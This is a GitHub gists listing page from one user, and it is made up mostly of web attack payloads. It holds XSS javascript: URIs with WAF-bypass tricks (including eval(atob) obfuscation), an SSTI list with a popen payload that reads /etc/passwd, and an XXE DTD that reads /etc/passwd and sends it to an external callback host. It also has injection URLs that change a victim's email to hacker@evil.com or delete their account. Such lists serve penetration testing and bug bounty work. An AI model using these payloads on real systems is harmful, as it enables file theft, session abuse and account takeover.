ratnadip1998

ratnadip1998 / gist:e26de2336e73e3317198547ddddfd39f

Created February 12, 2026 17:28

	javascript:alert(1)
	javascript:confirm(1)
	javascript:prompt(1)
	javascript:print()
	javascript:top.alert(1)
	javascript:self.alert(1)
	javascript:parent.alert(1)
	javascript:frames.alert(1)
	javascript:globalThis.alert(1)
	javascript:window.alert?.(1)

ratnadip1998 / gist:3b24f34648da7bc6145dba36bb0432b7

Created February 12, 2026 17:23

ratnadip1998 / gist:bd28e18959eb790764ae45ccb24883a3

Last active February 5, 2026 20:16

	# SSTI payloads (one per line)
	# payload\|\|expected_output
	# Example confirm:
	# {{7*7}}\|\|49
	#
	# File-read confirm example:
	# {{lipsum.__globals__['os'].popen('cat /etc/passwd').read()}}\|\|root:x:0:0

	# Safe math confirms
	{{7*7}}\|\|49

ratnadip1998 / ok

Created February 2, 2026 14:11

ratnadip1998 / Ok

Created January 28, 2026 13:35

ratnadip1998 / gist:e0f6697b8568697ef697172d71ad0383

Last active January 27, 2026 23:34

R-SCan

ratnadip1998 / exfil.dtd

Created October 3, 2025 09:54

	<!ENTITY % file SYSTEM "file:///etc/passwd">
	<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://%file%.h6ojcmzsjqtnjvjyv6als7vbl2rtfp3e.oastify.com/'>">
	%eval;

ratnadip1998 / t

Created August 18, 2025 15:32

	##Rare Cases
	/</script><script>alert()/
	'href=javascript:alert()>click me<a/y='
	"autofocus onclick=’alert()'

	Akamai Tricks & Tips
	* alert() => window['alert']()
	* alert() => this['alert']()
	* alert() => (alert)()
	* alert() => eval(atob('YWxlcnQoKQ=='))

ratnadip1998 / gt

Last active August 4, 2025 15:18

ratnadip1998 / xsssss

Last active July 1, 2025 21:11

	https://example.com/page?path=<img src="/change-email?new_email=hacker@evil.com">

	https://example.com/page?path=<iframe src="/delete-account?confirm=true" style="display:none;">

	fetch('/action?param=value', { credentials: 'include' });